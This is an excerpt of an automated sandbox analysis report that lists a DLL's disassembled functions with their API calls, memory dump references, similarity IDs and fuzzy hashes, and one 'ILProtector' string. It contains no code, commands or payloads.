                                                                                          • Instruction Fuzzy Hash: 78315E7AA04205AFDB00DF95C884FEEB7F9EF9A721F15815AE911A7340D735A901CBA0
                                                                                          Function 6D06A42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: T@12
                                                                                          • String ID: a0
                                                                                          • API String ID: 456891419-3188653782
                                                                                          • Opcode ID: 23701544b8d299c2de1e17a44fb7a57d6108f61da0f65b09e4f6c1ac8c684335
                                                                                          • Instruction ID: 63b74e9b4318c0308271bfbf20c259434ca947b5f0fa4518836104f86d8e1407
                                                                                          • Opcode Fuzzy Hash: 23701544b8d299c2de1e17a44fb7a57d6108f61da0f65b09e4f6c1ac8c684335
                                                                                          • Instruction Fuzzy Hash: 6311FE70D452A76AFB20BAB68C4CF7BBAFCEFC2754F219414A525E7141D728C941CAB0
                                                                                          Function 6D069BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 6D069BCF
                                                                                            • Part of subcall function 6D069D66: __FF_MSGBANNER.LIBCMT ref: 6D069D7F
                                                                                            • Part of subcall function 6D069D66: __NMSG_WRITE.LIBCMT ref: 6D069D86
                                                                                            • Part of subcall function 6D069D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D069DAB
                                                                                          • std::exception::exception.LIBCMT ref: 6D069C04
                                                                                          • std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 615853336-0
                                                                                          • Opcode ID: 17a39b3a40cfd9c3b41b28bcee23fce8b146182ad16b5779d8861d95add6aa4b
                                                                                          • Instruction ID: 19f19a382ab99582958ac4ae3c8156e5fef3391101b43845766f053ab35b499b
                                                                                          • Opcode Fuzzy Hash: 17a39b3a40cfd9c3b41b28bcee23fce8b146182ad16b5779d8861d95add6aa4b
                                                                                          • Instruction Fuzzy Hash: 7FF0C23140458EAEFF00EBA4ED10BAD7AF9AF42728F190419E50097692DFB08A45D7B1
                                                                                          Function 6D016C60 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6D016C73
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,6D016C3C), ref: 6D016C87
                                                                                          • _memmove.LIBCMT ref: 6D016C9A
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D016CA3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3147195435-0
                                                                                          • Opcode ID: 7a275b094932e2f6942b50a9aa41c938e7e5bd31b3133f6c00552c04707ba9e3
                                                                                          • Instruction ID: 19fb91f07377fb4f7974db1e31e81cb0018aef990084f111fda87af35ec3d35a
                                                                                          • Opcode Fuzzy Hash: 7a275b094932e2f6942b50a9aa41c938e7e5bd31b3133f6c00552c04707ba9e3
                                                                                          • Instruction Fuzzy Hash: E2F0FE75204218BBEF10AF95DC89F977BADEF9A766F018015FA188B240E771D5009BB1
                                                                                          Function 6D031FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D032206
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D032221
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036518
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036558
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$_mallocstd::exception::exception
                                                                                          • String ID: ILProtector
                                                                                          • API String ID: 84431791-1153028812
                                                                                          • Opcode ID: 3f4841735bd6884a78fb4707834ea61924aa4096d9451e29faf42ae6fafce360
                                                                                          • Instruction ID: faa55d19cf99a365876fb92a6aae8b9dab3bb42bd4ec463c1c1f3eea3c79a94f
                                                                                          • Opcode Fuzzy Hash: 3f4841735bd6884a78fb4707834ea61924aa4096d9451e29faf42ae6fafce360
                                                                                          • Instruction Fuzzy Hash: 8B712875909259DFDB24CFA8C844BEEBBB4FB49300F1581AAD51AA7341DB306A44CFA1
                                                                                          Function 6D019110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D01913B
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D01915C
                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6D019170
                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D019191
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: 7f373a0f620d4aa4cd29d1061e72079316845e49b4069bc2989eebdd8db1586f
                                                                                          • Instruction ID: 9df15a390fbf57231789cd7b443bcf2c5f7a79aba63b18ca23dd8b7d974b7a3d
                                                                                          • Opcode Fuzzy Hash: 7f373a0f620d4aa4cd29d1061e72079316845e49b4069bc2989eebdd8db1586f
                                                                                          • Instruction Fuzzy Hash: 0B4130769042099FDB04DF99D9849EEBBF5FF89310B11855ED926AB200D730EA05CFA1
                                                                                          Function 6D018E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32 ref: 6D018E89
                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 6D018EAD
                                                                                          • _memset.LIBCMT ref: 6D018ED2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave_memset
                                                                                          • String ID:
                                                                                          • API String ID: 3751686142-0
                                                                                          • Opcode ID: 603c16a7f228876de8e1546f7b214271ee616a75943d3018879128f40367e7d2
                                                                                          • Instruction ID: 08838a36cbecb08b513d5eda3277778d8df86e7635e796371af42d141699c855
                                                                                          • Opcode Fuzzy Hash: 603c16a7f228876de8e1546f7b214271ee616a75943d3018879128f40367e7d2
                                                                                          • Instruction Fuzzy Hash: 89515CB4A04205AFDB08CF98C890F6AB7B6FF89304F11855DE91A9B781D731EE55CB90
                                                                                          Function 6D01D920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6D01D949
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6D01D96C
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01D9CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 3149346722-0
                                                                                          • Opcode ID: 47068afe6b398f81a5fef9099912a0801232449f30a648780b9fc6c9dc7a2f7a
                                                                                          • Instruction ID: 86ef9455a07bcaccf3c0c48b01909d4c1643aea12948772c896ee1b5bf52aa18
                                                                                          • Opcode Fuzzy Hash: 47068afe6b398f81a5fef9099912a0801232449f30a648780b9fc6c9dc7a2f7a
                                                                                          • Instruction Fuzzy Hash: 6A214A75604219AFEB11CF98CC84FAB77A9EF8A740F104198E945DB244D7B1E901CBB1
                                                                                          Function 6D02DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02DB2D
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02DB45
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02DBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 3149346722-0
                                                                                          • Opcode ID: 3fb8620754b294a669f4f9415037934e68b15ba9ac2049ffe5ec3e7d7e7e0d50
                                                                                          • Instruction ID: 7506d96f46850b0d1672e40e097574bc37d4a6611147d4311e2c51b91ab04fac
                                                                                          • Opcode Fuzzy Hash: 3fb8620754b294a669f4f9415037934e68b15ba9ac2049ffe5ec3e7d7e7e0d50
                                                                                          • Instruction Fuzzy Hash: F4118E75642205AFEB00DF69C898F9ABBB8BF5A311F048159E9089B301D730E800CBE0
                                                                                          Function 6D02E2CE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc
                                                                                          • String ID: |m
                                                                                          • API String ID: 1579825452-3988610331
                                                                                          • Opcode ID: 841bb0086536baf03996fe898c6dd0cb0a383e6086b28637b1532409c8f6a4dc
                                                                                          • Instruction ID: fe1c9d0f26096f5a7afb66456d61fb309aed0a2b9d39d4983653be0bbd094221
                                                                                          • Opcode Fuzzy Hash: 841bb0086536baf03996fe898c6dd0cb0a383e6086b28637b1532409c8f6a4dc
                                                                                          • Instruction Fuzzy Hash: 9D817EB198D3828FFB20DFB4D89571EB7E0BB41304F56496ED248CB291E77598448B63
                                                                                          Function 6D033EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D034042
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D034059
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                          • String ID:
                                                                                          • API String ID: 2813683038-0
                                                                                          • Opcode ID: 1b3566bec9514ab041cef035d815aca31b117e30f0a5129a8791392c23c470d2
                                                                                          • Instruction ID: 56f6ac41a5fe63b0855bf49d379afc80350dc786c9b291b9f86fb184cafd0ee5
                                                                                          • Opcode Fuzzy Hash: 1b3566bec9514ab041cef035d815aca31b117e30f0a5129a8791392c23c470d2
                                                                                          • Instruction Fuzzy Hash: E391D3B1908701AFE701CF99D885B5EFBF8FF84340F16895AE5149B290E7B1D500CBA2
                                                                                          Function 6D01BDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D01BE2D
                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6D01BE6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroyReadSafe
                                                                                          • String ID:
                                                                                          • API String ID: 616443815-0
                                                                                          • Opcode ID: ebf947a88d1877b22ab9e8c5092481bb7d1ea791355dccaf1e2e4d379fa97e30
                                                                                          • Instruction ID: 51a07c98c7603a2e27472123cb9983b0a595ce6c4261573e4dd53d5852c5a496
                                                                                          • Opcode Fuzzy Hash: ebf947a88d1877b22ab9e8c5092481bb7d1ea791355dccaf1e2e4d379fa97e30
                                                                                          • Instruction Fuzzy Hash: 4C71BCB090C6975EFB218EA98C40779BBF1BB4B224F18839CD9A597396C731D442CB51
                                                                                          Function 6D0162C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D016466
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01647D
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 2299493649-0
                                                                                          • Opcode ID: 67a28b8cd5e09b393766e6e22b896532a10d045da4b4ed90cb75cc566ce2e1ff
                                                                                          • Instruction ID: 8e5b174d7116d1c658d635a1018b76c9c9833799e5ef8c4b3008e7df49c156c0
                                                                                          • Opcode Fuzzy Hash: 67a28b8cd5e09b393766e6e22b896532a10d045da4b4ed90cb75cc566ce2e1ff
                                                                                          • Instruction Fuzzy Hash: E6515AB190C3419FE700CF94DD85B5ABBE4BB85740F81492EFA998B290E771D904CBA3
